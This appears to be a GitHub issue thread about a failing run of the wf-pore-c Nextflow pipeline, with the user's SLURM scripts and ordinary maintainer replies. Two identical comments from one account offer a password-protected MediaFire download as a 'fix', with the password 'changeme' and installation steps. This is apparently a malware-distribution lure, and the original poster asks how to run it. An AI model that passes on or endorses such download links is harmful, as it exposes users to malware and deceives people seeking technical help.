### ISSUE TITLE
git clone

### ISSUE THREAD

**Issue by Blosers** [epi2me-labs/wf-pore-c#73]
### Ask away!

[nextflow.log](https://github.com/user-attachments/files/16755804/nextflow.log)
[pore-c.err.txt](https://github.com/user-attachments/files/16755805/pore-c.err.txt)
[pore-c.out.txt](https://github.com/user-attachments/files/16755806/pore-c.out.txt)
[pore-c.err.txt](https://github.com/user-attachments/files/16755811/pore-c.err.txt)
Hello,

I used git clone to download the relevant files and have also added the path to the .bashrc file. I created a new environment for the software and downloaded Nextflow. However, I still encountered issues when running it. Here are my commands:

#!/bin/bash
#SBATCH --job-name=pore-c
#SBATCH --partition=Par-2
#SBATCH --nodes=1
#SBATCH --ntasks-per-node=10
#SBATCH --error=/home/dingyuanhao/zxl_work/red_dwarf/DNPII/pore-c/pore-c.err
#SBATCH --output=/home/dingyuanhao/zxl_work/red_dwarf/DNPII/pore-c/pore-c.out

source ~/.bashrc
conda activate pore-c

nextflow run epi2me-labs/wf-pore-c \
        --bam '/home/dingyuanhao/zxl_work/red_dwarf/DNPII/red_dwarf.bam' \
        --chunk_size 100 \
        --cutter 'DPNII' \
        --hi_c true \
        --mcool true \
        --mcool_resolutions '1000,5000,10000,50000,100000,1000000' \
        --paired_end_maximum_distance 200 \
        --paired_end_minimum_distance 100 \
        --ref '/home/dingyuanhao/zxl_work/red_dwarf/HA-T2T.fasta' \
        -profile standard

or:
#!/bin/bash
#SBATCH --job-name=pore-c
#SBATCH --partition=Par-2
#SBATCH --nodes=1
#SBATCH --ntasks-per-node=10
#SBATCH --error=/home/dingyuanhao/zxl_work/red_dwarf/DNPII/pore-c/pore-c.err
#SBATCH --output=/home/dingyuanhao/zxl_work/red_dwarf/DNPII/pore-c/pore-c.out

source ~/.bashrc
conda activate pore-c

nextflow run /home/dingyuanhao/zxl_software/wf-pore-c  \
        --bam '/home/dingyuanhao/zxl_work/red_dwarf/DNPII/red_dwarf.bam' \
        --chunk_size 100 \
        --cutter 'DPNII' \
        --hi_c true \
        --mcool true \
        --mcool_resolutions '1000,5000,10000,50000,100000,1000000' \
        --paired_end_maximum_distance 200 \
        --paired_end_minimum_distance 100 \
        --ref '/home/dingyuanhao/zxl_work/red_dwarf/HA-T2T.fasta' \
        -profile standard

[.nextflow.log](https://github.com/user-attachments/files/16755787/default.nextflow.log)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Blosers** [comment]
> 要解决您的问题，请尝试下载此修复程序，我在另一个问题中看到它， https://app.mediafire.com/3ag3jpquii3of 密码：changeme 当您安装时，您需要在安装路径中放置一个检查并选择“gcc”。

您好请问，这个程序下载之后该如何操作呢？在linux中

**Comment by sarahjeeeze** [comment]
Hey looks like your input cmd is truncated try add newlines in cmd eg. 
```
nextflow run epi2me-labs/wf-pore-c \
--bam '/home/dingyuanhao/zxl_work/red_dwarf/DNPII/red_dwarf.bam' \
--chunk_size 100 \
--cutter 'DPNII' \ 
... etc
```

**Comment by Blosers** [comment]
> 嘿，看起来你的输入 cmd 被截断了，尝试在 cmd 中添加换行符，例如。
> 
> ```
> nextflow run epi2me-labs/wf-pore-c \
> --bam '/home/dingyuanhao/zxl_work/red_dwarf/DNPII/red_dwarf.bam' \
> --chunk_size 100 \
> --cutter 'DPNII' \ 
> ... etc
> ```

Sorry, there may be a flaw in the command I uploaded. Each line of the command displayed in my personal Linux port contains a line break: "Nextflow run/home/dingyuanhao/zxl_stoftware/wf-pore-c \
--Fastq/home/dingyuanhao/zxlw_work/red-dwarf/DNPII/pore-c/hic_data \, etc

**Comment by Blosers** [comment]
nextflow run epi2me-labs/wf-pore-c \
--bam '/home/dingyuanhao/zxl_work/red_dwarf/DNPII/red_dwarf.bam' \
--chunk_size 100 \
--cutter 'DPNII' \ 
... etc

我在离线和在线两个版本都曾尝试过，但是最终输出的报错结果都是一样的。

**Comment by SamStudio8** [comment]
Please use the Bug Report template to report issues so we can better help you! :)
